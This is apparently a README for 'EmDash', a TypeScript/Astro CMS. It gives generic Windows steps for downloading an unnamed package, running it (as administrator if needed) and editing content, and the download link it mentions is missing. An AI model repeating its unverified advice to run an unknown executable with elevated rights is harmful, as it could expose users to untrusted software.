EmDash is a content management app built with Astro and TypeScript. It gives you a simple way to create, edit, and publish site content from one place.
It is made for people who want a clean CMS without a heavy setup. You can use it to manage pages, posts, media, and site structure from a web browser on Windows.
Use a Windows PC with:
- Windows 10 or Windows 11
- A stable internet connection
- At least 4 GB of RAM
- About 500 MB of free disk space
- A modern browser such as Chrome, Edge, or Firefox
If you plan to run EmDash locally, your system should also allow apps to open a local web server.
Open this link and get the latest version:
If the page shows source files, look for a release file or a ready-to-run build on the page. Download the app package to your Windows computer, then move to the setup steps below.
- Open the download link above.
- Save the file to a folder you can find again, such as Downloads or Desktop.
- If the file comes as a
.zip, right-click it and choose Extract All. - Open the extracted folder.
- Look for the main app file or the setup file.
- Double-click the file to start emdash.
If Windows asks for permission, choose Yes so the app can open.
When emdash starts for the first time, it may take a short time to load.
You may see a browser window open with the app interface. If that happens, keep the window open and let the app finish loading.
If the app asks for a port, use the default value shown on screen. Most users can leave this unchanged.
EmDash is built to keep content work simple.
You can use it to:
- Create new pages
- Edit existing posts
- Organize content into sections
- Add titles, text, and images
- Review changes before publishing
- Keep site content in one place
The layout is meant to be easy to follow. Use the left side to move between sections. Use the main area to edit content.
- Open emdash in your browser.
- Sign in if your setup uses an account.
- Choose the content type you want to edit.
- Make your changes.
- Save your work.
- Check the preview if one is available.
- Publish when your content is ready.
If you manage more than one page or post, use clear names so you can find items fast.
Use the new item button or menu entry to start a page or post. Add a title first, then fill in the body text.
Select the item you want to change, make your edits, then save. If you need to undo a mistake, look for an undo option or restore the last saved version.
You can usually add images or files from a media panel. Pick the file from your PC, then insert it into the content area.
Use folders, tags, or groups if the app supports them. This helps keep large sites in order.
EmDash is built as a full-stack TypeScript CMS with Astro. That means it is set up for fast page loading, clean structure, and a simple content flow.
Common features include:
- Content editing in a browser
- Fast page rendering
- Structured page and post management
- Type-safe app logic
- Clean layout for focused writing
- Support for modern web workflows
- A setup that fits small and medium sites
For the smoothest experience, use:
- Windows 11
- 8 GB of RAM
- A recent Intel or AMD CPU
- A current browser version
- A stable local network if you run the app on another device
If you plan to use emdash often, keep it in a fixed folder so you can find it fast.
If nothing happens after you start emdash:
- Check that the file finished downloading.
- Make sure you extracted the files if they came in a zip archive.
- Try running the app again as administrator.
- Close other programs that use a lot of memory.
- Restart Windows and try again.
- Open the repository page and check for the latest version.
If your browser does not open on its own, copy the local address shown by the app and paste it into the browser bar.
Keep the downloaded file in a folder you trust. Do not rename files inside the app folder unless you know what they do. If you move the app, move the full folder together so the files stay linked.
